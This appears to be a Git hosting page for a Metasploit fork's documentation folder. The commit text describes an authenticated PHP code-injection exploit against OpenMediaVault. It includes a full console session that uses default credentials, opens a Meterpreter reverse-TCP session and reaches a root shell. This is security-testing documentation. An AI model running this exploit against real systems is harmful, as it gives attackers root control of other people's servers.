adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ca3a4cacb59d4ae464efc56f1b9faa800b91f9dc
metasploit-gs/documentation/modules
T
History
stasinopoulos ca3a4cacb5 OpenMediaVault 5.5.11 Authenticated Remote Code Execution 
This module exploits an authenticated PHP code injection vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12  inclusive in the "sortfield" POST parameter of "rpc.php" page, because json_encode_safe is not used in config/databasebackend.inc. Successful exploitation allows arbitrary command execution on the underlying operating system as root.

### Usage Example
```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  openmediavault   yes       Password to login with
   HttpUsername  admin            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
rhosts => 192.168.56.108
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
lhost => 192.168.56.105
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
[+] 192.168.56.108:80 - Authenticated successfully.
[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
[*] 192.168.56.108:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : 192.168.56.108
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1499 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```
2020-10-07 09:59:45 +03:00
..
auxiliary
Update documentation based on feedback
2020-10-01 09:19:15 -04:00
evasion/windows
Don't be lazy and spell out "introduction" in docs
2019-09-30 16:58:00 -05:00
exploit
OpenMediaVault 5.5.11 Authenticated Remote Code Execution
2020-10-07 09:59:45 +03:00
payload
Merge upstream into 6.x
2020-07-15 09:58:07 -05:00
post
Land #14199, Fix SecureCRT missing registry key bug
2020-09-30 13:17:06 -05:00
module_doc_template.md
Add checks to msftidy_docs and update the template for them
2020-07-23 20:37:39 -04:00